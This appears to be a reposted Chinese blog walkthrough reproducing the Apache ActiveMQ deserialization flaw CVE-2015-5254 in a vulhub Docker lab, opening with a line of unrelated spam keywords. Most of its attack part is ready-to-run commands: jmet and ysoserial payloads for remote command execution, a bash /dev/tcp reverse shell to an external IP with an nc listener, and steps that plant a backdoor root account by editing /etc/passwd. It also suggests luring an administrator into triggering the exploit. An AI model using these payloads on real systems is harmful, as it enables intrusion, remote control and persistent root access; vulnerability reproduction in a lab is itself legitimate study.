html网站开发工具下载,系统优化大师免费版,网站附件做外链,建设银行手机绑定网站0x00 漏洞前言 Apache ActiveMQ是美国阿帕奇#xff08;Apache#xff09;软件基金会所研发的一套开源的消息中间件#xff0c;它支持Java消息服务#xff0c;集群#xff0c;Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞#xff0c;该漏洞源于… 0x00 漏洞前言 Apache ActiveMQ是美国阿帕奇Apache软件基金会所研发的一套开源的消息中间件它支持Java消息服务集群Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务JMSObjectMessage对象利用该漏洞执行任意代码。 0x01 漏洞环境 1.在ubuntu16.04下安装docker/docker-compose: # 安装pip
curl -s https://bootstrap.pypa.io/get-pip.py | python3
# 安装最新版docker
curl -s https://get.docker.com/ | sh
# 启动docker服务
service docker start
# 安装compose
pip install docker-compose
# 下载项目
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
unzip vulhub-master.zip
cd vulhub-master
# 进入某一个漏洞/环境的目录cd activemq/CVE-2015-5254/
# 自动化编译环境
docker-compose build 2.运行漏洞环境 docker-compose up -d 环境运行后将监听61616和8161两个端口其中61616是工作端口消息在这个端口进行传递; 8161是网络管理页面端口访问http://your-ip:8161即可看到网络管理页面不过这个漏洞理论上是不需要网络的。 使用浏览器直接访问activemq查看是否部署完毕 http://45.32.101.90:8161/admin/默认的用户名/密码为admin/admin 0x02 漏洞复现 1.漏洞利用过程如下 a.构造可以使用ysoserial可执行命令的序列化对象 b.作为一个消息发送给目标61616端口 c.访问的Web管理页面读取消息触发漏洞 2.使用jmet进行漏洞利用: 首先下载jmet的jar文件并在同目录下创建一个external文件夹否则可能会爆文件夹不存在的错误。jmet原理是使用ysoserial生成Payload并发送其jar内自带ysoserial无需再自己下载所以我们需要在ysoserial是gadget中选择一个可以使用的比如ROME。 cd /optwget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jarmkdir external 3.执行命令 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y touch /tmp/sucess -Yp ROME 45.32.101.90 61616 4.此时会给目标的ActiveMQ添加一个名为事件的队列可以我们通过http://45.32.101.90:8161/admin/browse.jsp?JMSDestinationevent看到这个队列中所有消息 5.点击查看这条消息即可触发命令执行 6.此时进入容器 docker exec -it cc0e9385f975 /bin/bash 7.可看到/ tmp /已成功创建说明漏洞利用成功 8.反弹shell: java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y bash -i /dev/tcp/45.32.101.90/123401 -Yp ROME45.32.101.90 61616 远程主机监听1234端口 nc -lvvp 1234 即可看到反弹是shell: 值得注意的是通过网络管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下我们可以诱导管理员访问我们的链接以触发或者伪装成其他合法服务需要的消息等待客户端访问的时候触发。 9.添加用户 执行jmet的命令添加test用户并将其添加到root组,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestinationevent页面点击一下消息触发它 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y useradd -g root -s /bin/bash -u 10010 test -Yp ROME 45.32.101.90 61616 让我们再将passwd中的test的uid修改为0使它拥有root权限,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestinationevent页面点击一下消息触发它。 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y sed -i s/test:x:10010/test:x:0/g /etc/passwd -Yp ROME 45.32.101.90 61616 让我们再为test用户设置一个密码,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestinationevent页面点击一下消息触发它。 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y echo test:sd123456 | chpasswd -Yp ROME 45.32.101.90 61616 到此为止一个权限为root密码为123456的用户即创建完毕。我们可以使用ssh直接远程登陆进入操作系统并且还是最高权限。 0x03 参考链接 https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf 转载于:https://www.cnblogs.com/backlion/p/9970516.html
